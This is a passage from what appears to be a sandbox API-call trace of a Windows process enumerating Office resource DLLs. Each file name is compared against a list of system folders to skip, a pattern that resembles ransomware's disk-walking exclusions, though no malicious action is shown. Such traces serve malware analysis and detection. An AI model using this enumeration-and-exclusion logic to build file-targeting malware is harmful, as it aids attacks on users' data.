CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0126.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.259] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6297232, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6297232, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6297232, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0126.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22cdc8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0126.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0126.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0126.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.260] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ca90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.260] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d578, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.261] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12dd5ae, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf13037fa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.261] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.262] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa937f07, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa937f07, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae22cc9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0126.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0126.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0126.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0126.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d298, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0126.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247b80 [0126.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0126.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.262] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6034d6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6034d6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x605aed7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0126.262] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0126.263] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dba8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0126.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0126.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0126.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.263] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4d48116, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4d48116, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8080, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0126.263] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0126.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0126.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0126.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.264] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc3e44f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0126.264] 